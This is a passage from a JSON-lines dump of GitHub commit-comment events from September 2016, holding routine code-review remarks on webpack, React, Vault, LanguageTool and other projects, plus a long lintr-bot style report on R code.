{"id":"4605197929","type":"CommitCommentEvent","actor":{"login":"katekourbatova"},"repo":{"name":"katekourbatova/phase-0-tracks"},"payload":{"comment":{"id":19137170,"position":null,"line":null,"path":null,"commit_id":"d60b7fa9afae0ffb8570e50ef00e855b5293c8aa","created_at":"2016-09-22T21:24:48Z","updated_at":"2016-09-22T21:24:48Z","body":"Collaborated with @NoahRGuy -- great working with you!"}},"created_at":"2016-09-22T21:24:48Z"}
{"id":"4605198291","type":"CommitCommentEvent","actor":{"login":"jerone"},"repo":{"name":"1000ch/atom-svgo"},"payload":{"comment":{"id":19137171,"position":null,"line":null,"path":null,"commit_id":"494190c1b7db344da42b12572789697db9d2e6a4","created_at":"2016-09-22T21:24:52Z","updated_at":"2016-09-22T21:24:52Z","body":"@1000ch Why did you remove this selector? This is only useful on svg files. My context-menu already gets cluttered with functions."}},"created_at":"2016-09-22T21:24:52Z"}
{"id":"4605200158","type":"CommitCommentEvent","actor":{"login":"Murulidhar"},"repo":{"name":"iovisor/bcc"},"payload":{"comment":{"id":19137177,"position":null,"line":null,"path":null,"commit_id":"52938058460cadac111234b92fd0018c03327e92","created_at":"2016-09-22T21:25:14Z","updated_at":"2016-09-22T21:25:14Z","body":"Hi, \r\nIs there any ways to  filter destination address also ? like if I mention destination address then only connections going to that IP only should be displayed. "}},"created_at":"2016-09-22T21:25:14Z"}
{"id":"4605203884","type":"CommitCommentEvent","actor":{"login":"Kevin-Wei"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19137189,"position":null,"line":null,"path":null,"commit_id":"eb01247bc4f3fa98c112e7cbe36ad0a641f3371e","created_at":"2016-09-22T21:25:58Z","updated_at":"2016-09-22T21:25:58Z","body":"@arasevic might have to revert this if the feature is really being protected on master by these steps"}},"created_at":"2016-09-22T21:25:58Z"}
{"id":"4605205388","type":"CommitCommentEvent","actor":{"login":"marcoagpinto"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19137193,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-22T21:26:15Z","updated_at":"2016-09-22T21:26:15Z","body":"The version is in the .AFF: V2.40 - 2016-09-01\r\n"}},"created_at":"2016-09-22T21:26:15Z"}
{"id":"4605206508","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137195,"position":66,"line":66,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:26:28Z","updated_at":"2016-09-22T21:26:28Z","body":"respect for that. Really good stuff"}},"created_at":"2016-09-22T21:26:28Z"}
{"id":"4605207314","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137198,"position":67,"line":67,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:26:37Z","updated_at":"2016-09-22T21:26:37Z","body":"why .sss?"}},"created_at":"2016-09-22T21:26:37Z"}
{"id":"4605209850","type":"CommitCommentEvent","actor":{"login":"Nos59"},"repo":{"name":"Nos59/Sudoku-online"},"payload":{"comment":{"id":19137208,"position":1,"line":1,"path":"README.md","commit_id":"8a068aee86adb10c956b13169bbc59d82dc4acd4","created_at":"2016-09-22T21:27:07Z","updated_at":"2016-09-22T21:27:07Z","body":"123"}},"created_at":"2016-09-22T21:27:07Z"}
{"id":"4605211984","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137214,"position":48,"line":48,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:27:32Z","updated_at":"2016-09-22T21:27:32Z","body":"you probably can just pass module name strings, check out current PostCSS configuration API"}},"created_at":"2016-09-22T21:27:32Z"}
{"id":"4605214143","type":"CommitCommentEvent","actor":{"login":"flqrian"},"repo":{"name":"flqrian/website"},"payload":{"comment":{"id":19137220,"position":3,"line":1,"path":"Gemfile","commit_id":"29240e19946e5bc39797db1acb4d8ab3de7ee782","created_at":"2016-09-22T21:27:57Z","updated_at":"2016-09-22T21:27:57Z","body":"text correction"}},"created_at":"2016-09-22T21:27:57Z"}
{"id":"4605217158","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137228,"position":30,"line":30,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:28:34Z","updated_at":"2016-09-22T21:28:34Z","body":"writing -loader is optional, you can just write like `loader: 'css!scss'`"}},"created_at":"2016-09-22T21:28:34Z"}
{"id":"4605221753","type":"CommitCommentEvent","actor":{"login":"DevinWalker"},"repo":{"name":"WordImpress/WP-Rollback"},"payload":{"comment":{"id":19137238,"position":13,"line":35,"path":"includes/rollback-action.php","commit_id":"c46a4124166fd4d7620f5102494c07323e960dcd","created_at":"2016-09-22T21:29:30Z","updated_at":"2016-09-22T21:29:30Z","body":"yeah I updated that\n\nOn Thu, Sep 22, 2016 at 2:19 PM, Pedro Mendonça <notifications@github.com>\nwrote:\n\n> Hi @DevinWalker <https://github.com/DevinWalker>,\n> Didn't you mean *This rollback request is missing a proper query string.*?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/WordImpress/WP-Rollback/commit/c46a4124166fd4d7620f5102494c07323e960dcd#commitcomment-19137085>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABf7M2CGwOt0z1WxbHpj6ODbdSQoiL_Gks5qsvDWgaJpZM4KEX6k>\n> .\n>\n\n\n\n-- \n\nDevin Walker\n\nFounder & Lead Developer\n\nP:\n\n858-449-6460 <8584496460>\n\nW:\n\nhttp://wordimpress.com\n\n433 G Street #201\nSan Diego, CA 92101 <https://goo.gl/maps/BePgp>\n<https://www.facebook.com/wordimpressive>  <https://twitter.com/wordimpress>\n  <https://plus.google.com/u/0/b/117062083910623146392/+Wordimpress/about>\n<http://wordimpress.com/>\n"}},"created_at":"2016-09-22T21:29:30Z"}
{"id":"4605223866","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137242,"position":39,"line":39,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:29:56Z","updated_at":"2016-09-22T21:29:56Z","body":"next thing you will probably need to configure will be loaders for images, fonts, sounds and other assets. Webpack is very powerful for that and you can implement very smart dynamic resources loading so the game will work very well on mobile. It is very important."}},"created_at":"2016-09-22T21:29:56Z"}
{"id":"4605226201","type":"CommitCommentEvent","actor":{"login":"flqrian"},"repo":{"name":"flqrian/website"},"payload":{"comment":{"id":19137251,"position":4,"line":3,"path":"source/stylesheets/all.css.scss","commit_id":"29240e19946e5bc39797db1acb4d8ab3de7ee782","created_at":"2016-09-22T21:30:24Z","updated_at":"2016-09-22T21:30:24Z","body":".."}},"created_at":"2016-09-22T21:30:24Z"}
{"id":"4605227723","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137258,"position":34,"line":34,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:30:42Z","updated_at":"2016-09-22T21:30:42Z","body":"I am not sure what is it, but this hashing looks like something unnecessary on current stage of the project"}},"created_at":"2016-09-22T21:30:42Z"}
{"id":"4605229348","type":"CommitCommentEvent","actor":{"login":"kimisgold"},"repo":{"name":"omeka/Omeka"},"payload":{"comment":{"id":19137262,"position":null,"line":null,"path":null,"commit_id":"41b27de12e4007db0c809664a8b2491a98972c25","created_at":"2016-09-22T21:31:02Z","updated_at":"2016-09-22T21:31:02Z","body":"That was the original intent, but I had missed the section nav usage. Fixed in https://github.com/omeka/Omeka/commit/61da66f65bbbb2805fb6051f0f7972e1fb2d09c1."}},"created_at":"2016-09-22T21:31:02Z"}
{"id":"4605234079","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19137273,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-22T21:32:00Z","updated_at":"2016-09-22T21:32:00Z","body":"See http://forum.languagetool.org/t/update-en-gb-speller/1051/17, I can confirm that `couldn't` etc. is now detected as an error. We'll need to fix this or roll it back. We probably shouldn't do these kind of changes in feature freeze."}},"created_at":"2016-09-22T21:32:00Z"}
{"id":"4605235020","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137275,"position":11,"line":11,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:32:12Z","updated_at":"2016-09-22T21:32:12Z","body":"what is `cheap-module-eval-source-map`? why is it used and what's the difference with `inline-source-maps`?"}},"created_at":"2016-09-22T21:32:12Z"}
{"id":"4605236902","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137281,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:32:35Z","updated_at":"2016-09-22T21:32:35Z","body":"Thanks, then I am going to fix the eclipse errors. But probably tomorrow."}},"created_at":"2016-09-22T21:32:35Z"}
{"id":"4605237165","type":"CommitCommentEvent","actor":{"login":"jackkoenig"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19137282,"position":null,"line":null,"path":null,"commit_id":"4fbe647a9d54d20821353e1c15ba99fc794c70ca","created_at":"2016-09-22T21:32:38Z","updated_at":"2016-09-22T21:32:38Z","body":"I don't think should import postfixOps, rather we should remove suffix notation on arity-0 function calls. The import is necessary because this notation is a compiler warning, right?\r\n\r\nSee http://docs.scala-lang.org/style/method-invocation.html#suffix-notation"}},"created_at":"2016-09-22T21:32:38Z"}
{"id":"4605238752","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"JonathanToro/dsp"},"payload":{"comment":{"id":19137291,"position":null,"line":null,"path":null,"commit_id":"c5c1408fc978d6b8001926fdb27cbafa8071f58b","created_at":"2016-09-22T21:33:00Z","updated_at":"2016-09-22T21:33:00Z","body":"RE: 05a-python.md \r\nHello @JonathanToro \r\ncc: @reshamametis @aramnath @julialintern @galvin-mj\r\n\r\n\r\nGood job in completing the Advanced Python section! 👍\r\nSome optional extras if you have the time:\r\n\r\na. Explore defaultdict option in python\r\n\r\ndefaultdict means that if an key is not found in the dictionary that instead of a KeyError being thrown a new value is created. The type of this new pair is given by the argument of defaultdict.\r\n\r\nb. Explore pprint in python\r\nPrints output in a more readable and structured format.\r\n\r\nThanks for presenting your work thoroughly and clearly 😃\r\n\r\n"}},"created_at":"2016-09-22T21:33:00Z"}
{"id":"4605240957","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137295,"position":8,"line":8,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:33:27Z","updated_at":"2016-09-22T21:33:27Z","body":"easier and more universal is to use NODE_ENV, since you might need webpack configuration in environment that is not a unix console"}},"created_at":"2016-09-22T21:33:27Z"}
{"id":"4605241304","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19137297,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-22T21:33:31Z","updated_at":"2016-09-22T21:33:31Z","body":"Also, we need test cases to fail when these contractions are not accepted anymore."}},"created_at":"2016-09-22T21:33:31Z"}
{"id":"4605248898","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137326,"position":4,"line":4,"path":"src/components/App.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:35:06Z","updated_at":"2016-09-22T21:35:06Z","body":"Why? React is even moving into deprecating this way of creating classes, leaving only ES6 classes as a standard way. There is no reason in 2016 to use `React.createClass`"}},"created_at":"2016-09-22T21:35:06Z"}
{"id":"4605249947","type":"CommitCommentEvent","actor":{"login":"jefferai"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19137331,"position":null,"line":null,"path":null,"commit_id":"47771e7da35d24cc6faf8325265386832e97f41c","created_at":"2016-09-22T21:35:18Z","updated_at":"2016-09-22T21:35:18Z","body":"Do we allow IPv6? If so you should also check the ipv6 zero string, I think.\r\n\r\nIn fact, it's dangerous to call `To4` will-nilly, because if it's actually an IPv6 address, `To4` returns nil so you'll panic here. You may want to call this, and if it's nil, call To16 and check the result of that. Then depending on which is non-nil (or neither), check against net.IPv4zero or net.IPv6zero."}},"created_at":"2016-09-22T21:35:18Z"}
{"id":"4605250088","type":"CommitCommentEvent","actor":{"login":"cing"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19137332,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T21:35:21Z","updated_at":"2016-09-22T21:35:21Z","body":"Can you check out this notebook where I adjusted the bins/estimator and tell me if this looks unusual? I can send the trajectory over email if you want, it's only 11MB, 2us. \r\n[TestNewMutInf.ipynb.zip](https://github.com/msmbuilder/mdentropy/files/488408/TestNewMutInf.ipynb.zip)\r\n"}},"created_at":"2016-09-22T21:35:21Z"}
{"id":"4605250521","type":"CommitCommentEvent","actor":{"login":"danstruthers"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19137334,"position":133,"line":398,"path":"core/src/main/java/com/orientechnologies/orient/core/command/script/OCommandExecutorScript.java","commit_id":"98687a37b18e8a9f84cd7a4d61134d2bcf337750","created_at":"2016-09-22T21:35:26Z","updated_at":"2016-09-22T21:35:26Z","body":"I was wondering if you should be checking for unmatched quotes (lastQuote != null) and throwing an exception.  I haven't tried this out to see if there is a problem, but it looks like some defensive programming goodness could be had here.  It could be the case the quote matching is done elsewhere as well and would be redundant here, but I didn't see evidence of it elsewhere.  Thanks!"}},"created_at":"2016-09-22T21:35:26Z"}
{"id":"4605251181","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19137335,"position":null,"line":null,"path":null,"commit_id":"331c5e5cffde4414da0f86fd606d1888a0818221","created_at":"2016-09-22T21:35:32Z","updated_at":"2016-09-22T21:35:32Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - 